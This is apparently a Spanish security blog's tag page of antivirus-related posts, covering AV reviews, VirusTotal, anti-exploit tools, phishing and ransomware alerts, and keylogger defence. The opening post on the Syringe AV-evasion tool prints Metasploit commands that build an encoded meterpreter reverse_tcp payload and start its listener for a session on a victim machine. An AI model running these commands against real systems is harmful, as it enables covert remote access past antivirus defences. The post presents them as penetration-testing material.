Mostrando entradas con la etiqueta Antivirus. Mostrar todas las entradas
Mostrando entradas con la etiqueta Antivirus. Mostrar todas las entradas
















Hace un tiempo publique una serie de tres artículos sobre las diferentes forma de crear un fichero ejecutable  (exe) con capacidad de evasión del sistema Antivirus utilizando el framework de seguridad #Metasploit. 

En su momento estuve tentado de crear un script que generase un ejecutable con un PAYLOAD según unas especificaciones previas, y  que automáticamente comprobase en Virustotal su eficacia. Ahora, buceando en Internet he ido a parar a http://www.commonexploits.com quién ha creado precisamente un script que realiza exactamente eso, es decir, generar un payload con metasploit con técnicas de evasión de antivirus.

Sin embargo, aunque el script (AV0id) es muy interesante, ese mismo artículo me ha puesto sobre la pista de una herramienta de gran utilidad,  cuyo objetivo es evadir (bypass) los sistema antivirus. Es precisamente sobre esto ultimo de lo que voy a hablar a continuación.

¿Qué es syringe?

Durante un test de penetración puede resultar muy útil disponer algún ejecutable con capacidad de "puerta trasera" (backdoor) con el que demostrar la debilidad encontrada tomando el control del equipo objeto del análisis. Es en este punto donde entra en juego el Syringe creado por un investigador de Seguridad independiente llamado Hasan (aka inf0g33k). Hasan publica un documento técnico (PDF) donde explica la técnica que utiliza para cargar la shell, generada con Metasploit, en memoria y demuestra con un ejemplo su funcionamiento.

La herramienta, básicamente carga en memoria un PAYLOAD de tipo meterpreter generado por Metasploit, utilizando técnicas de ENCODING de forma que pueda evadir el sistema Antivirus del sistema. (Asunto que ya se ha tratado en otra ocasión en el blog).

¿Cómo funciona?

Esta herramienta, syringe, utiliza la función VirtualAlloc para reservar una región de la memoria en Windows con permisos de ejecución específicos (read and write). Esta función requiere que el shell code este formado con caracteres alfanuméricos para que puede ser ejecutado. 



Para generar el código (shellcode) utiliza el framework Metasploit, luego genera un ejecutable utilizando la herramienta 7z y una serie de bash script,  fragmento de código en visual basic script (vbs) simplemente es para oculta el terminal de consola durante la ejecución del bash script. Cómo nota de interes, el autor, en su herramienta syringe introduce el código (shellcode) en un bloque estructurado del tipo SEH (Structured Exception Handler) que será el que habilite la ejecución del código (shellcode) de forma exitosa, a través de la función VirtualAlloc.

Los parámetros utilizado para generar el PAYLOAD son:

msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread
LPORT=4444 LHOST=IP_KalinLinux R | msfencode -a x86 -e
x86/alpha_mixed -t raw BufferRegister=EAX

Una vez creado el ejecutable SFX, se debe de iniciar un servidor que gestione las conexiones en el puerto 4444 del shellcode generado, esto se hace tal y como se vio en mi artículo sobre Metasploit, de forma que:

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp
EXITFUhread LPORT=4444 LHOST=IP_KaliLinux E
Llegados a este punto, solo es necesario ejecutar el fichero SFX (exe) generado [bash script makeExeFromBat.bat] y tendremos una sesión de meterpreter sobre el equipo de la victima.

Download


Licencia: GNU GPL v3

Fichero: Syringe_Pack
SHA: b720d32f2ad43defab223d85646ac6b3786f9de7



Referencias:

Via: @teamcymru


Hoy en http://thehackernews.com, informan sobre el lanzamiento de la versión 2.0 de X-Ray, un programa de escritorio que promete ser una interfaz de antivirus que trabaja con los motores de detección de VirusTotal.

Con X-Ray 2.0 se podrán enviar aquellos archivos que consideremos peligrosos directamente a virustotal, para ser analizados por los 35 motores de antivirus con los que cuenta (Agnitum, Antiy Labs, Avast, AVG, Avira, Bitdefender, QuickHeal, ClamAV, Comodo, Dr.Web, Emsisoft, ESET, F-Prot, F-Secure, Fortinet, Hacksoft, Ikarus, K7Antivirus, Kaspersky, Kingsoft, McAfee, Microsoft, Norman, nProtect, Panda, PC Tools, Rising, Sophos, SUPERAntiSpyware, Symantec, TotalDefense, TrendMicro, VBA32, Vipre, ViRobot).



Características:

  • Automatically submit files to 35 different antivirus companies via email or web based submission method for manual analysis.
    - Abort upload progress
    - Retrieve latest scan report from VirusTotal (API 2.0)
    - Send file to VirusTotal for scanning (API 2.0)
    - Automatic failover when chosen method for sending files to VirusTotal fails.
    - Two methods of sending files to VirusTotal (Email and API)
    - Copying MD5 hash and results to clipboard via right click context menu.
    - History (VirusTotal detection report and Analysis Submission date & time)
    - Clear History
    - Change submission method for a particular antivirus from Settings
    - Test email settings
    - Auto update checker
    - Support 6 CAPTCHA recognition service
    - Proxy Support
    - Right Click “Send To”
    - Support Windows XP/Vista/7/8 (32bit & 64bit)
    - Freeware (no spyware or adware embedded)
    - Portable (history and encrypted settings are stored in AppData)

    Read more: http://www.raymond.cc/blog/xray/#ixzz2Ag8PDVcA

Descargar

Puedes descargar el programa en su página WEB o pinchando en el siguiente enlace.

Últimamente se esta poniendo en entre dicho la funcionalidad de técnicas de protección que están desde hace mucho tiempo con nosotros como son el "Antivirus" y "Cortafuegos", los motivos son la evolución de las técnicas y/o vectores de ataque que el "Malware" utilizan para introducirse en el Sistema.

En efecto, las técnicas de ataque actuales que son utilizadas por el Malware (virus, troyanos, gusanos, botnets, etc) son mucho más sofisticadas, buscan explotar las vulnerabilidades (preferiblemente zero-day) de las aplicaciones mas extendidas en los Sistemas, como son Java, Navegador WEB, Adobe PDF, etc 

Además de explotar estas vulnerabilidades, aplican otras técnicas como son cifrado de comunicaciones, cifrado y/o ofuscación del código que cargan en la memoria tras explotar la vulnerabilidad, técnicas de evasión de antivirus, etc. Es por ello que a día de hoy el Antivirus y/o un cortafuegos de entrada son insuficientes para estar protegido cuando salimos a Internet.

¿Qué podemos hacer?

Gracias a un artículo de Sergio de los Santos (@ssantosv), he conocido una herramienta muy prometedora, se trata de Exploitshield, un software que detecta las técnicas de intentos de explotación de vulnerabilidades en el Sistema, bloqueando la ejecución de las mismas, de esta forma evitan que se lleve a cabo con éxito la explotación de una vulnerabilidad y evitando por tanto la infección del Sistema mediante este tipo de técnicas.

En la página web de este programa, nos muestran un vídeo de como su software es capaz de bloquear múltiples intentos de ejecución de código arbitrario en nuestro Sistema a través de una vulnerablidad en JAVA.



Características de ExploitShield:

La versión beta 0.7, permite la detección y bloqueo de técnicas de ataque a través del navegador Web en las siguientes aplicaciones:

  • Web browsers (Internet Explorer, Firefox, Chrome, Opera)
  • Media players (Windows Media Player, VLC, QuickTime, Winamp)
  • Microsoft Office (Word, Excel and Powerpoint)
  • PDF readers (Adobe Acrobat, Reader & Foxit Reader)

Esta herramienta no es la única complementaría que podemos usar para combatir el Malware, además de Exploitshield, Microsoft ha lanzado otro software que trabaja de forma similar y promete actuar frente al Malware que intenta acceder a zonas de memoria no autorizadas, es decir, exploits que pretender ejecutar código arbitrario a través de una vulnerabilidad. 

Se trata de EMET (Enhaced Mitigation Experience Toolkit) un software que permite a los usuarios mejorar la seguridad de las aplicaciones que ejecutamos en Windows utilizando dos características de seguridad avanzados de Windows Vista y Windows 7, estamos hablando de Address Space Layout Randomization (ASLR) y Data Execution Prevention (DEP). 

Dos características de Windows que se encargan de dificultar la ejecución exitosa de exploits y dificultar al Malware localizar los sectores en memoria en los que se sitúan los datos que los atacantes pretenden conseguir/reemplazar, aunque es una herramienta muy interesante, existen técnicas de evasión de ASLR y DEP, aunque esto no quiere decir que no sea efectiva, sino que "puede" prevenir los ataques.

¿Y Ahora qué?

Al igual que el Antivirus no es capaz de detectar todas las amenazas, y de protegernos ante cualquier tipo de virus/troyano o Malware, estos programas no serán capaces de parar y/o bloquear todos los ataques, pero de una cosa estamos muy seguros, sin ellos "estamos vendidos", para explicarlo con más claridad utilizaré es mismo ejemplo que Sergio de los Santos en su artículo.

El Antivirus es nuestro chaleco antibalas, y los programas antiexploits son nuestro casco y protecciones en las extremidades, sin embargo, como sabemos quedarían algunas partes del cuerpo sin proteger completamente, pero lo que esta claro que ya no será suficiente con un simple disparo, si no que tendrá que ser un autentico francotirador de elite.


Bajo la premisa de que la Seguridad Absoluta no existe, sabemos que siempre habrá una probabilidad y un riesgo de que las medidas de protección no sean capaces de detectar y eliminar la amenazas, pero en algo estaremos de acuerdo, yo de vosotros me pondría el chaleco antibalas, el caso, guantes e incluso espinilleras antes de salir a un campo de tiro (Internet).

Resumiendo

Dicho todo lo anterior, mi recomendación es complementar el software antivirus con otras medidas de protección adicionales, como por ejemplo Exploitshields, y otras herramientas de seguridad adicionales como un Host IDS, mejorando algunos aspectos de configuración de nuestro Sistema, con WinLockLess, etc.

Un Host IDS como Patriot NG herramienta que detecta cambios "sospechosos" en la configuración del sistema y/o ataques en nuestra red de área local, como por ejemplo la red inalámbrica.

Y por supuesto, la mejor manera de mantenernos protegidos, es intentar actualizar todas las aplicaciones que tengamos instaladas, sobre todo JAVA, Adobe flash, PDF, etc. Y sobre todo, lo que no sea necesario desinstalarlo.

Yo ya tengo instalado exploitshield ¿y tu? voy a darle una oportunidad.

Referencias


Me ha llamado mucho la atención un artículo publicado en http://www.itproportal.com y que hace "eco" de ello en "The Inquirer" que pone en duda la utilización de los Sistemas de Antivirus, según un grupo de expertos en Seguridad Informática. 

Antes de rebatir las (in)justificadas declaraciones, veamos que fue lo que dijeron exactamente esos "expertos" en seguridad:
Según desvelan en la popular revista Wired, la mayoría de los expertos de seguridad que trabajan para empresas tecnologicas no utilizan antivirus ni recomiendan hacerlo.[The Wired]
Y aún hay más:
.... consideran innecesario su uso ya que sus propios hábitos de navegación en internet evitan infecciones.
Es decir:
Básicamente, no visitan webs con contenidos maliciosos, no hacen click en enlaces no solicitados, ni tampoco abren archivos adjuntos de dudosa procedencia.
REBATIENDO SUS ARGUMENTOS

Para empezar, estos supuestos expertos paracen no conocer ciertas técnicas u amenazas como son el "tabjacking", "clickjacking", y se encuentran muy seguros sin un sistema de protección como son los Antivirus, navegando por sus páginas habituales sin temor alguno, !simplemente¡ porque ellos no descargan archivos "sospechosos" (=.=).
El Clickjacking, o Secuestro de clic, es una técnica maliciosa para engañar a usuarios de Internet con el fin de que revelen información confidencial o tomar control de su computadora cuando hacen clic en páginas web aparentemente inocentes.[wikipedia]
Sinceramente, no entiendo cómo alguien que se considera experto en "Seguridad" es capaz de afirmar que los antivirus no son necesarios, es como decir que los frenos del coche no hacen realmente falta si utilizas el "freno con el motor", o tus hábitos de conducción te permiten frenar el coche sin "ellos".

Si al menos, hubieran planteado soluciones alternativas, si se hubieran justificado la decisión tomada, explicando que otras medidas alternativas tienen aplicadas para proteger su información, podríamos evaluar sus medidas con objeto de identificar si realmente "mitigan" el riesgo que existe o si definitivamente han encontrado la forma de parar al "malware".

Pero según las declaraciones, simplemente si seguimos todos sus hábitos de navegación no necesitaremos un sistema antivirus en nuestro ordenador. ¿A caso no conocen las técnicas de manipulación de los DNS?, donde un atacante podría manipular / suplantar las páginas web que visita habitualmente e inyectar malware a través de las mismas¡ ¿Donde quedaría ahora su técnica de navegación habitual? o es que acaso todas las amenazas de "malware" tienen como único vector de ataque Internet.... !Increible¡ se han olvidado de la propagación de malware a través de USB, lo que deduzco de sus declaraciones es que no han visto un USB en su vida! 

En mi opinión, el sistema antivirus es necesario como una medida más en la protección de tu información, lo que proporciona un sistema antivirus es evitar que las "amenazas" conocidas e identificadas comprometan tu información y tu seguridad.

Podemos estar de acuerdo que los Antivirus no son capaces de "parar" todo!... pero si la mayoría del ecosistema del malware, y creo que, al contrario que los expertos consultados en theInquirer, que es muy necesario para proteger tu ordenador del "malware" y es una medida más que aplicar en la protección de información. Sobre todo considero que el antivirus es una herramienta de seguridad muy necesaria para el gran público en general.

Yo uso Antivirus, en particular el Microsoft Security Esential, ya comentado en otra ocasión en este blog, que además ganó el premio al mejor antivirus del 2011; lo recomiendo. ¿y tu, utilizas Antivirus?

Un Saludo.

Fuente | TheInquirer
TrendMicro ha liberado el código fuente de su utilidad gratuita HiJackThis para favorecer el mantenimiento evolutivo del producto, y generar una comunidad open source entorno al mismo.

¿Qué es HiJackThis?

Es una utilidad gratuita que genera un informe detallado de la configuración de archivos y del Registro del equipo. Esto facilita la tarea de análisis y evaluación de la Seguridad de un equipo.

Esta utilidad permite eliminar del equipo los elementos deseados. Además de esta capacidad de exploración y eliminación, HijackThis incluye varias herramientas útiles para eliminar manualmente el malware de un equipo.

¿Cómo funciona?

Ventana principal de la herramienta.
Una vez instalada la aplicación y ejecutada aparecerá una venta con un "Menú Principal", donde se podrá escanear el sistema y extraer un informe detallado con las configuraciones y archivos que han sido modificadas y/o añadidas en el Sistema Operativo (Windows) a lo largo de su funcionamiento. [Ver imagen inferior].

Es una herramienta que requiere de cierto nivel técnico para la interpretación adecuada de la información que proporciona.

Esta herramienta analiza todos los add-ons, barras de herramientas, plugins y demás tipos de extras instalados en nuestro sistema operativo, permitiéndonos que los analicemos a fondo y eliminando aquellos que no nos interesen o que puedan ser Malware.


HijackThis también incluye varias herramientas útiles (de uso manual) para modificar el archivo Host, borrar archivos al reinicio, eliminar servicios de Windows, desinstalar programas, etc.

Resultado de un análisis realizado por la herramienta.

Por tanto, hay que dejar muy claro, que a menos que se conozca exactamente lo que se esta haciendo no se recomienda realizar ninguna modificación sobre la configuración del Sistema.

Repositorio Open Source

El código fuente se encuentra disponible en la siguiente página web:

Fuente | Infospyware | TrendMicro España | Twitter
En una encuesta realizada a través del Blog "Genbeta" sobre el mejor antivirus del 2011, sale proclamado como ganador el Microsoft Security Essentials, en nuestro blog (www.seguridadparatodos.es) hicimos su correspondiente análisis donde podréis descubrir sus características, fortalezas y debilidades.


Si tienes Windows 7 os recomiendo que probéis este anitivirus! y si tenéis problemas de actualización en redes que operan con sistemas de conexión a Internet basado en Proxy de autenticación, os dejamos la solución en nuestro Blog, con el artículo !Actualización offline de Microsoft Security Essentials (MSE) ! en este artículo, se realiza una revisión sobre los problemas de actualización del Antivitus MSE cuando se utiliza un proxy y se proponen las soluciones correspondientes.

Un Saludo.
MSE (Microsoft Security Essentials) como ya sabréis es el antivirus gratuito de Microsoft, y como no puede ser de otra forma, en ocasiones se sacrifican opciones de configuración en "pro" de la facilidad del usuario. 

Cuál es mi sorpresa cuando me encuentro que el MSE ante un proxy "squid" con autenticación activada no es capaz de conectarse y actualizar la base de firmas.

La Investigación

Según foros de MSE Microsoft, el mecanismo de actualización del antivirus es el mismo que el utilizado por el Windows Update, de forma que si se puede llevar a cabo la actualización del Sistema Operativo debería de poder actualizarse el Antivirus.

Configuración de Conexión a Redes de Internet Explorer
Para actualizar el Sistema Operativo hay varios métodos, el más común y utilizado es a través la propia aplicación Windows Update, este toma la configuración para conectarse a Internet de navegador web Internet Explorer (véase la imagen superior), y en mi caso, se actualiza el sistema operativo correctamente, pero no el antivirus. 

Configuración de Proxy en el Sistema Operativo Windows 7

"Surfeando" por Internet y buscando información al respecto, para configurar el acceso mediante proxy en Windows Vista / Windows 7 / Windows 8 Server se utiliza el comando "netsh" tal y como se explica a continuación:


Configuración del Proxy en el Sistema: 
 
En un terminal de consola con permisos de Administrador se ejecutan 
los siguientes comandos:
 
Check the settings with (Comprobación de la configuración existente):

  netsh winhttp show proxy 
 
Configuración del Proxy:

  netsh winhttp set proxy {proxy address:port} {bypass list}
  netsh winhttp set proxy "proxy.bohack.com:8180" "<local>;*.bohack.com"
Borrar la configuración mediante proxy:
 netsh winhttp reset proxy
Netsh Proxy Settings Windows 7

Sin embargo, en una configuración de red con la utilización de archivos ".pac" para la configuración automática de servidores proxy con sistema de autenticación, la configuración del proxy mediante "netsh" no resulta ser muy efectiva.

Microsoft Security Essentials Proxy Errors.
¿Solución?

Por tanto he tenido que recurrir a buscar la solución de actualizar la base de datos de las firmas del antivirus de forma Offline.
 
La solución es la actualización manual del antivirus mediante la descarga de las firmas desde la página web de Microsoft:
En este foro se propone la creación de un sistema semiautomático que permita la descarga y difusión de las firma del antivirus. Para ello se propone descargar diariamente las firmas del antivirus MSE, utilizando el comando "wget" portado a windows (descargar aqui) mediante un bash script en un servidor "Maestro / Master" y mediante carpeta compartida en windows utilizar el comando MpCmdRun.exe perteneciente a MSE (Microsoft Security Essentials) para la instalación remota de las firmas.

Referencias

Es posible que muchos de vosotros ya conoscais el sistema de protección contra virus, troyanos, spyware y malware que tiene Microsoft a disposición, de forma gratuita, a todos aquellos poseedores de una licencia original del Sistema Operativo Windows. No obstante, me gustaría presentaros en detalle la herramienta.

Microsoft Security Essentials [MSE], que es un servicio gratuito para equipos que tengan instalado Windows original, te ofrece protección completa y avanzada contra amenazas malintencionadas tales como virus, troyanos, spyware y otros malware.

Introducción

MSE esta basado en la plataforma de protección antimalware de Microsoft avalada por el sector, se aprovecha de la misma tecnología antimalware básica que alimenta el resto de los productos de seguridad de Microsoft, incluidos el Microsoft Forefront.

Microsoft Forefront es una línea completa de productos (suite comercial) de seguridad tanto para clientes de Microsoft Windows y Windows Server. Según Microsoft, la línea de productos proporcionará a las empresas múltiples capas de defensa contra las amenazas.

Microsoft Security Essentials ha recibido el premio VB100 de Virus Bulletin Ltd., la certificación Checkmark de West Coast Labs y la certificación de ICSA Labs. Microsoft Security Essentials tiene el respaldo del Centro de protección contra malware de Microsoft (MMPC), disponible únicamente en inglés, que proporciona funciones de respuesta e investigación antimalware de primera clase, compatible con todos los productos y servicios de seguridad de Microsoft.

NOTA: Recientemente Microsoft Security Essentials detector por "error" al navegador Google Chrome como una "Malware" y realizaba la eliminación completa de la computadora. (Ver noticia aquí)

¿Cómo se obtiene el Microsoft Security Essentials?

Obtener Microsoft Security Essentials es tan fácil como hacer clic en un botón de descarga. Tu sistema descargará Microsoft Security Essentials en el idioma que necesites y se instalará* con unos pocos clics. Una vez que hayas instalado Microsoft Security Essentials, el software se actualiza automáticamente.


¿Resulta fácil de utilizar?

Microsoft Security Essentials se ejecuta de forma silenciosa y eficaz en segundo plano, por lo que eres libre para usar tu PC como desees. El software usa la ya conocida codificación en colores verde, amarillo y rojo para designar el estado de seguridad de tu PC, y un icono con codificación en color en la barra de tareas te informa de un vistazo si es necesaria tu atención. Es fácil: si está verde, todo va bien. Sin embargo, si ves un icono amarillo o rojo, puedes realizar la acción necesaria directamente desde el icono de la bandeja del sistema sin tener que entrar en la aplicación.

Cuando se requiere la intervención del usuario, este recibe con claridad el estado y las acciones recomendadas en la página principal y a través de las alertas de la aplicación, que están diseñadas para reducir al mínimo las interrupciones. Además, se pueden tomar medidas inmediatas directamente desde una alerta.

Ventajas frente a otros Sistemas Antivirus

En este aspecto, me gustaría destacar, como un valor añadido a tener en cuenta para la elección de este programa, la característica de detección de "rootkits".

Los rootkits son un tipo de malware del cual es especialmente difícil protegerse. Un rootkit es una herramienta o un grupo de ellas, que tiene como finalidad esconderse a sí misma y esconder otros programas, procesos, archivos, directorios, claves de registro, y puertos que permiten al intruso mantener el acceso a un sistema para remotamente realizar acciones o extraer información sensible.

Microsoft Security Essentials incluye varias tecnologías nuevas y mejoradas para hacer frente a los rootkits y otras amenazas hostiles. Estas tecnologías son:
  • Supervisión dinámica del comportamiento del kernel, que envía solicitudes de telemetría y actualización al servicio de firma dinámica siempre que un nuevo rootkit que no se detecte con las firmas tradicionales ataque o modifique el kernel del equipo.
  • Funcionalidad mejorada contra el modo sigiloso (con compatibilidad para el análisis directo del sistema de archivos como parte de los exámenes rápidos y completos), lo que permite identificar y eliminar los programas y controladores malintencionados que un rootkit haya ocultado en el sistema de archivos.
  • Eliminación dinámica de rootkits mejorada gracias a la carga dinámica de un nuevo controlador del modo kernel que permite que Microsoft Security Essentials actúe con la firmeza necesaria para quitar satisfactoriamente algunos de los rootkits más avanzados.

Así mismo, incluye cabe destacar que la excelente integración del sistema antimalware con el cortafuegos (firewall) del sistema operativo, la mejora en la detección de falsos positivos (un error ponen en jacke esta capacidad) y por ultimo, el sistema de detección de instrusos mediante la inspección del tráfico de red, siendo capaz de mitigar los ataques conocidos de forma proactiva, donde el usuario no tienen que realizar ninguna acción, es una función automática que bloquea el tráfico en el que se ha identificado un intento de vulnerabilidad de seguridad. [NOTA: Esta capacidad solo esta disponible en windows vista o windows 7].

Valoración

Excelente sistema de protección para nuestros equipos, siempre que dispongan del sistema operativo MS Windows Vista o 7. Una opción muy recomendable, al menos para aquellos equipos que cuente con "licencias originales" y estén buscando una alternativa a su sistema antivirus actual, y quieran dotar de características extras completamente gratis.

Lo mejor de todo que es una herramienta muy completa, que ofrece características avanzadas, que otros no ofrecen en la modalidad "gratuita".

El principal inconveniente, salvo "errores" en el motor de detección de falsos positivos (caso Google Chrome), es la limitación de la protección de navegación WEB a Internet Explorer. 

Por lo demás no presenta ningún inconveniente, de hecho, recomiendo que se le de la oportunidad, para ver si efectivamente es "superior" en capacidad de detección y análisis contra los virus, tal y como afirma el propio fabricante en su página web.

Si se desea, puede consultarse los análisis detallados de [PCActual,GenBeta,Genbeta (2)].

Requisitos del Sistema

Sistema operativo: Windows XP Service Pack 3 (SP3)*; Windows Vista (Service Pack 1, o Service Pack 2)*; Windows 7*
  • Para Windows XP, PC con una velocidad de reloj de CPU de 500 MHz o superior, y memoria RAM de 256 MB o superior.
  • Para Windows Vista y Windows 7, un equipo con una velocidad de reloj de CPU de 1,0 GHz o superior y memoria RAM de 1 GB o superior.
  • Pantalla VGA de 800 × 600 o superior.
  • 200 MB de espacio disponible en el disco duro.
  • Es necesaria una conexión a Internet para la instalación y descarga de las definiciones más recientes de virus y spyware para Microsoft Security Essentials.
  • Explorador de Internet:
    • Windows Internet Explorer 6.0 o posterior.
    • Mozilla Firefox 2.0 o posterior.
  • Microsoft Security Essentials también admite Windows XP Mode en Windows 7.
VirusTotal.com es una página web (online) que ofrece la posibilidad de analizar archivos y direcciones de páginas web (URL) en busca de virus y malware.

VirusTotal es una iniciativa "Española" desarrollada por la empresa malagueña Hispasec Sistemas, las principales características de VirusTotal es la capacidad de analizar los ficheros y/o url's (websites) por multiples motores de antivirus de manera simultenea, ofreciendo una alta capacidad de detección de virus, troyanos, malware, etc.

Además, conserva una base de datos con análisis previos realizados por otros usuarios, que favorece la detección de las mutaciones y acelera la detección.

Servicios de VirusTotal

Los servicios que ofrece VirusTotal son:

VTchromizer: una extensión (add-ons) de navegador Google Chrome que permite al usuario acceder y utilizar los servicios de VirtusTotal facilmenente.

VTzilla: es una extensión (add-ons) para el navegador Mozilla Firefox, que al igual que la extensión del navegador Google Chrome, permite al usuario interactuar facilmente con VirusTotal, analizar URL, y subir ficheros.

VT Uploader:  Es una aplicación gratuita para el sistema operativo Microsoft Windows que permite analizar ficheros locales del sistema facilmente en VirusTotal. Incluso es capaz de analizar procesos que se estan ejecutando.

Public API: Dispone de unas librerias para desarrolladores. (HTTP + JSON interface to automate analysis tasks with VirusTotal and retrieve scan reports, both on URLs and files).

VT Community: Permite la interacción del usuario en la comunidad de VirusTotal, comentarios, debates, análisis, etc.

Si te has descargado un archivo que parece "sospechoso" y no estas totalmente seguro que tu aplicación de antivirus lo haya analizado correctamente, es decir, !!! te quedan dudas ¡¡¡, puedes utilizar el servicio de VirusTotal y librarte de las sospechas.

¿Cómo se utiliza el Servicio?

Una vez accedemos a la página web, nos aparece un formulario igual a de la figura, ahora solo tenemos que seleccionar el fichero sospechoso que tenemos en nuestro equipo y pulsar el botón "Send file", despues quedamos a la espera de que nos muestre el resultado.


Una vez se ha pulsado el botón "Send file", aparece una pequeña pantalla indicandonos que se encuentra enviando el archivo, en el momento que finaliza, hace una primera comprobación para ver si el fichero que has subido, ha sido analizado previamente, en caso, afirmativo os saldrá una pantalla como la siguiente:


En este momento, se tiene la certeza que el "binario" subido (fichero .EXE) ha sido analizado previamente, esto se comprueba gracias al algoritmo de generación del hash (resumen de bits) MD5. Ahora se puede acceder inmediatamente al informe resultado del análisis, haciendo click en "View last report".


En en el informe se observa, que el archivo subido es 100% libre de malware, y ha sido analizado por multiples motores de antivirus. (La imagen es solo una pequeña muestra de los 43 motores de antivirus que analizarán simulteneamente cada uno de los binarios que subamos al servicio).

Recordar que el tamaño máximo de los ficheros es 20Mb, y que puede usarse utilizando conexiones seguras HTTPS.

Extensiones del Navegador Web

La utilización de las extensiones (add-ons) para los navegadores web pueden ser muy utiles, para analizar documentos (doc, pdf, ppt, etc) que buscamos en Internet antes de descargarlas al equipo, o incluso una URL antes de acceder a ella. Pues se integra en el menú y la barra del navegador, de forma que se puede pulsar sobre un enlace (link) e iniciar un analisis online con VirusTotal.
Ejemplo, pulsar botón derecho sobre un enlace (link).


Notas: Reiniciar firefox una vez instalada la extensión. Con Google Chrome no es necesario.

Hace poco días, escribí un articuló analizando sobre la seguridad y las amenazas de los códigos QR, titulado: "QR Code: Seguridad y Amenazas", donde describía la posibilidad de utilizar los QR codes como un vector de ataque, diferenciando entre ataques automáticos (SQL Injection) o manuales (Phishing).

Recordatorio

QR Code: es un código bidimensional que contiene la información tanto en la dirección vertical, como en la horizontal. La información es obtenida, capturando la información mediante una cámara (foto) y analizándola con un lector de códigos (QR).

Los códigos QR pueden contener todo tipo de información, aunque su utilización más extendida es almacenar URL (direcciones de páginas web), teléfonos de contacto, o incluso direcciones postales.

La noticia que os traigo hoy, es que los "ciberdelincuentes" han comenzado a utilizar los QR Code para infectar móviles Android con troyanos, no se descartan como objetivos otras plataformas de teléfonos móviles como iOS (iPhone/iPad/iPod Touch).

¿Cómo se produce el ataque?


En ocasiones los desarrolladores de aplicaciones para Android ofrecen la posibilidad de acceder a la descarga de la aplicación redirigiendo a los usuarios al enlace mediante un código QR. Los ataques consisten en ocultar en el QR Code redirecciones (URL) a programas infectados con Malware (troyanos, virus, botnets, etc).

Los laboratorios de Kaspersky han detectado varios códigos que camuflaban enlaces a páginas web maliciosas que distribuían aplicaciones infectadas con Malware., especialmente diseñados para los móviles con Sistema Operativo Android.

¿Cómo protegernos?

Con carácter general, las recomendaciones son:
  1. Instalar en nuestro móvil un sistema Antivirus.
  2. Mantener correctamente actualizado el Antivirus.
  3. Instalar aplicaciones confiables, preferiblemente descargadas directamente desde la tienda oficial de aplicaciones (Android Market).
  4. Antes de instalar la aplicación se debe prestar atención a los permisos de seguridad que necesita la aplicación, y si no te convence, cancela la instalación e investiga el porqué necesita la aplicación ese tipo de permisos.
  5. Si te encuentras con código QR, se debe prestar atención al lugar (website) y antes de proceder a escanear el código, verificar si es posible, por otro medio que la aplicación existe, que suele utilizar los códigos QR en sus promociones y páginas web. Por ultimo, si no ten convence demasiado, desconfía y evita realizar la lectura del código.
Por supuesto, te recomendamos que leas nuestro artículo sobre Consejos de Seguridad para Smartphone.


Referencias

[1] TheThreatpost.com
[2] Securelist.com
ZonaVirus y Oficina de Seguridad del Internauta (OSI) nos ponen en aviso de un peligroso email que ha empezado a circular masivamente por Internet referente a la recogida de un paquete postal de la oficina de Correos. Por supuesto, este correo es totalmente falso y se aconseja eliminar inmediatamente.

Amenaza: E-mail malicioso
Técnica: Phising (engaño)
Adjuntos: Ficheros adjuntos comprimidos ZIP, infectado con un virus poco conocido.
Nombre técnico: mutación de ElistarA

La peligrosidad se debe a que, en estos momentos, el virus (contenido en el fichero comprimido) es detectado por un número muy reducidos de Antivirus, por ello se aconseja actualizar diariamente los antivirus, y si recibes este correo eliminar inmediatamente.

El análisis de VirusTotal.com refleja que por el momento los antivirus tan populares como Avast, o AVG, no detectan este virus.


Siguenos en Twitter, y si lo prefieres por RSS.
Nivel: Medio / Alto
Categoria: Rasomware.AN
Propagación: múltiples vías , mas extendidas por medio del spam y el P2P.
Dirigido: principalmente a usuarios de habla alemana.
Descripción:  malware que “secuestra" al equipo de la víctima hasta que se introduce un código determinado. Para obtener el código, los ciberdelincuentes solicitan a la víctima 100 euros por el “rescate". El troyano amenaza incluso con denunciarte a las autoridades por piratería.
Eliminación: muy complicado si se desea realizar de forma manual , el método mas efectivo es formatear el equipo.

Recomendación:
Mantener actualizado el sistema antivirus y tener precaución al abrir los correos electrónico con archivos ejecutables.

Via: CSIRT-CV
Más informacion: Pandalabs Security
Level: Principiante.

Un keylogger (derivado del inglés: key (tecla) y logger (registrador); registrador de teclas) es un tipo de software o un dispositivo hardware específico que se encarga de registrar las pulsaciones que se realizan en el teclado, para posteriormente memorizarlas en un fichero o enviarlas a través de internet.

Esta herramienta y/o característica se encuentra incluida en algunos virus / troyanos mediante la cuál los intrusos intentan capturar, por ejemplo, las claves de acceso a tu cuenta bancaria.

Para protegernos de los keylogger se utilizan, individual o conjuntamente, herramientas tales como Anti-Malware (Antivirus), Cortafuegos, Monitores de Red (IDS) o incluso software Anti-Keylogger.

En general, la mayoría de los keylooger de tipo software son detectados y eliminados por los sistemas Anti-Malware (Antivirus) más conocidos.

Lo más efectivo contra los keylogger suelen ser disponer de un conjunto de estas técnicas de protección, es decir, aplicar lo que se conoce como defensa en profundidad. Esto consiste en ir aplicando capas de protección de dentro hacia afuera, como si de una cebolla se tratase. De esta forma si una de las protecciones falla, quedará otra oportunidad de frenar el ataque.

Ejemplo: Software cortafuegos y antivirus instalados en el equipo. Además disponer de un router cortafuegos configurado restringiendo un tipo especifico de tráfico.

Resumiendo:

Para protegerse ante este tipo de amenazas, se deben de tomar las siguientes precausiones:

  1. Instalar software legitimo, y solamente lo que sea estrictamente necesario.
  2. Mantener actualizado a la última versión Sistema Operativo y el resto de aplicaciones que tengamos instaladas.
  3. Tener activado el Antivirus, y el cortafuegos, Tener el Antivirus correctamente actualizado.
  4. No ejecutar programas que no sean de confianza.
  5. A ser posible, usar una cuenta limitada de windows para el uso habitual del ordenador, de esta forma si algunas de las otras protecciones fallase, la cuenta limitada, conseguirá bloquear la ejecución de programas que requieran la elevación de privilegios (Administrador).
El punto 5) es quizás una de las recomendaciones más importantes. Utilizar el windows como usuario limitado minimizará el riesgo de infección, en un porcentaje muy elevado.

Por el momento, con estas recomendaciones deberían bastar para protegernos de los ataques y amenazas del Malware,y en particular, de los keylogger.